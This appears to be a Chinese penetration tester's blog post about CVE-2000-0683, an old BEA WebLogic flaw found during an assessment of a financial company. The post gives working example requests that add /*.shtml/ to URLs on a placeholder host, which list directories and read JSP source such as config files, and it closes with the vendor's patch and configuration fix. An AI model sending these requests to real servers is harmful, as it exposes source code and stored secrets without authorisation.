今天为某金融公司做测试,在系统中发现了一枚很老的漏洞 CVE-2000-0683 ,Nessus里面给出的漏洞评级是中危,但是经过测试,发现是一个危害很高的漏洞。
在以前的测试过程中还没有遇到过这个洞,也许是我孤陋寡闻了,但也许有很多人和我一样不知道的,所以在这里简单分享一下。
相关介绍
Tenable Nessus关于该漏洞的描述:
https://www.tenable.com/plugins/nessus/11604

这个漏洞利用起来很简单,只需要在URL中加入/*.shtml/
就可以列目录或者读源码,例如:假设漏洞位于http://victim.com/
,那么如果想要列目录,只需要请求:
http://victim.com/*.shtml/
http://victim.com/*.shtml/admin/
http://victim.com/*.shtml/config/
即可列出相应目录下的文件。
如果需要读取源代码,只需要请求
http://victim.com/*.shtml/index.jsp
http://victim.com/*.shtml/admin/login.jsp
http://victim.com/*.shtml/config/config.jsp
即可读取相应的源代码。
实战利用
以下是我的测试过程。
列目录:

读源码:

漏洞修复
内容来自相关供应商(BEA security advisory BEA00-03.00):
(1) Apply the “Show Code” vulnerability patch available from BEA Technical Support. This patch is available for:
Version:
- The J-Engine in BEA WebLogic Enterprise 5.1.x
- BEA WebLogic Server and Express 5.1.x
- BEA WebLogic Server and Express 4.5.x
Action: Contact BEA Technical Support at support () bea com for patch.
(2) Once the patch has been applied, review the weblogic.propertiesfile and ensure that the following changes have been made:
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.file=defaultFilename=index.html
weblogic.httpd.defaultServlet=file
should be changed to:
weblogic.httpd.register.*.html=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.*.html=defaultFilename=index.html
weblogic.httpd.defaultServlet=*.html
Future Service Packs for BEA WebLogic Server and Express will also contain the patch to address this vulnerability.
本漏洞分享仅供学习交流,请勿用于从事非法活动。